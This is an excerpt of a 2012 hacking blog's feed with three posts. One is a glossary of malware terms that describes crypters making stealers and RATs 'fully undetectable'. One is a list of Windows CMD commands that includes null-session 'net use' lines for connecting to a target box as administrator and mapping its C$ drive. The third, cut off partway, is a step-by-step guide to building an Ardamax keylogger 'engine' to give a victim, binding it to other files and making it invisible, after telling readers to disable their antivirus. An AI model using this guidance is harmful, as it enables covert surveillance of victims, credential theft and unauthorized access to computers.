cracking?&lt;/b&gt;&lt;br /&gt;A: Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file&#39;s access is restricted.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a virus/trojan/malicious script?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;A: A computer virus is a computer program that can copy itself and infect a computer. The term &quot;virus&quot; is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a stealer?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a RAT?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features.&lt;br /&gt;RAT - Remote Administration Tool.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a keylogger?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is BOT?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A bot is a malicious program which has several purposes.&lt;br /&gt;They are usually told what to do by a botnet admin although many of the features now are automated.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a BOTNET?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is a crypter?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: How does a crypter work?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is reverting?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is social engineering?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: What is DDos?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: DOS - Denial Of Service.&lt;br /&gt;This is using bots. If you have a large number of bots you make them send packets to the target site and make them break down.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: How is website and forum hack possible?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A: There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it.&lt;br /&gt;Sql, XSS, LFI, RFI, DNS poisoning etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Q: Can everyone be hacker?&lt;/b&gt;&lt;br /&gt;A: No, u need Curiosity&amp;nbsp;in Hacking and Geeky stuffs, a brain and common sense. ;)&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Hope this post help you in understanding some basic terms. :)&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/2000542023662724226/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-common-terms-in-hacking-explained.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2000542023662724226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2000542023662724226'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-common-terms-in-hacking-explained.html' title='Some Common Terms in Hacking Explained'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-IGo4NczX70c/T2LzgniTNUI/AAAAAAAAAEc/0r65krGEdHI/s72-c/Hacker.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-5661883082775562867</id><published>2012-03-17T11:30:00.000+05:30</published><updated>2012-03-17T11:30:04.632+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="IP Address"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Some Useful CMD Commands</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-agvJMuMzyB0/TnMMbZxiy5I/AAAAAAAAAkI/TTfRi9uFdGk/s1600/command-prompt.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-agvJMuMzyB0/TnMMbZxiy5I/AAAAAAAAAkI/TTfRi9uFdGk/s1600/command-prompt.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Here are some&amp;nbsp;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;Useful Things to do on CMD!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;In case you don&#39;t know how to get CMD open in your box, then click on Start, then Run, then type &quot;cmd&quot; (no quotes, off course... you know the drill).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;Back to commands:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Commands:-&lt;/b&gt;&lt;br /&gt;nslookup,&lt;br /&gt;net view,&lt;br /&gt;net use,&lt;br /&gt;net user,&lt;br /&gt;ping,&lt;br /&gt;tracert,&lt;br /&gt;arp route,&lt;br /&gt;nbtstat,&lt;br /&gt;netstat&lt;br /&gt;ipconfig.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In case you don&#39;t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lets start easy...&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;1) ping&lt;/span&gt; : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the &quot;ping&quot; command.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;ping x.x.x.x (x is the IP address)&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;ping http://www.anysite.com (http://www.anysite.com is the website you want to ping, but you don&#39;t know the IP)&lt;br /&gt;PS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2) nslookup&lt;/span&gt; : This command has many functionalities.&lt;br /&gt;One is for resolving DNS into IP.&lt;br /&gt;Lets say you know the website URL but you don&#39;t know its IP(and you want to find out).&lt;br /&gt;&lt;br /&gt;nslookup http://www.anysite.com (http://www.anysite.com is the website you want to find out the IP)&lt;br /&gt;&lt;br /&gt;Now, another really nice function of nslookup is to find out IP of specific Mail Severs.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;nslookup (enter) set type=mx (enter) yahoo.com&lt;br /&gt;This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn&#39;t it?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3) tracert &lt;/span&gt;: This command will give you the hops that a packet will travel to reach its final destination.&lt;br /&gt;&lt;br /&gt;PS: This command is good to know the route a packet takes before it goes to the target box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;tracert x.x.x.x (x is the IP address)&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;tracert http://www.anysite.com (http://www.anysite.com is the website you don&#39;t know the IP)&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4) arp &lt;/span&gt;: This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;arp -a&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5) route &lt;/span&gt;: This command will show you the routing table, gateway, interface and metric.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;route print&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6) ipconfig &lt;/span&gt;: This command will show tons of very helpful things.&lt;br /&gt;Your IP, gateway, dns in use.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;ipconfig&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;ipconfig /all&lt;br /&gt;this command will give all that info but for all networks you might have it.&lt;br /&gt;&lt;br /&gt;Also, in case you have a dynamic IP and want to change it, then type...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP)&lt;br /&gt;&lt;br /&gt;PS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don&#39;t do anything stupid.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7) netstat&lt;/span&gt; : This command will show you connection to your box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;netstat&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above)&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8)nbtstat &lt;/span&gt;: This command will show you the netbios name of the target box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computername&lt;br /&gt;net view x.x.x.x or computername (will list the available sharing folders on the target box)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now some hints:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;net use \ipaddressipc$ &quot;&quot; /user:administrator&lt;br /&gt;(this command will allow you to connect to the target box as administrator)&lt;br /&gt;&lt;br /&gt;Now if you want to connect to the target box and browse the entire C drive, then use this command:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;net use K: \computernameC$&lt;br /&gt;(this will create a virtual drive on your &quot;my computer&quot; folder)&lt;br /&gt;&lt;br /&gt;PS: Keep in mind that this will only works if the target box doesn&#39;t have an administrator password set.&lt;br /&gt;&lt;br /&gt;And least but not last, the &quot;help&quot; command.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;br /&gt;whatevercommand /help&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;whatevercommand /?&lt;br /&gt;&lt;br /&gt;This command will help you to understand what it does and all the switchs available for each command.&lt;br /&gt;Very useful if you know the command, but forgot the right switch.&lt;br /&gt;&lt;br /&gt;:)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/5661883082775562867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-useful-cmd-commands.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5661883082775562867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5661883082775562867'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-useful-cmd-commands.html' title='Some Useful CMD Commands'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-agvJMuMzyB0/TnMMbZxiy5I/AAAAAAAAAkI/TTfRi9uFdGk/s72-c/command-prompt.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-6488370879413904734</id><published>2012-03-16T03:30:00.000+05:30</published><updated>2012-03-16T18:18:48.635+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="virus"/><title type='text'>How to setup a keylogger(ardamax) and Spread it [Step by Step]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://pctechnotes.com/wp-content/uploads/2011/08/keylogger.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://pctechnotes.com/wp-content/uploads/2011/08/keylogger.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ardamax Keylogger 2.85 Complete Download + Tutorial + Guide&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Download the keylogger &lt;a href=&quot;http://download.cnet.com/Ardamax-Keylogger/3000-2162_4-10353737.html&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #c27ba0;&quot;&gt;Please Turn off your anti-virus....It is because keylogging is basically a trojan builder it will show detection...I have checked the copy and it is clean version...&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #c27ba0;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;SETTING-UP KEYLOGGER:-&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;1. Once you&#39;ve downloaded and installed it, you&#39;ll see a little notepad icon in your taskbar.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;2.Now right-hand click it and click &#39;Enter registration key...&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;3.Copy/Paste Registration name and Registration key from Serial.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;4.Once done click &#39;Ok&#39; and you should get a pop-up saying &#39;Registration code is accepted. Thank you for registration!&#39;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;II. Creating the Keylogger Engine:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;1. Now your going to make the Keylogger Engine (The thing you give to your victim). Click &#39;Remote Installation...&#39;,&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;click &#39;Next&#39;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;2.Now,you should see this.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;3.If you want to bind Keylogger Engine with another application or file click the box that says &#39;Append keylogger engine to file or another applitacion&#39; and browse file or applitacion that you want to bind it with.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;4. Now click &#39;Additional components&#39; and tick &#39;Installation Package Bilder&#39; like done in the screenshot.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;5.Now you should be at &#39;Invisibility&#39;, make sure all the boxes are ticked, then click &#39;Next&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;6. Now you should be at &#39;Security&#39;, click &#39;Enable&#39; and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click &#39;Next&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br 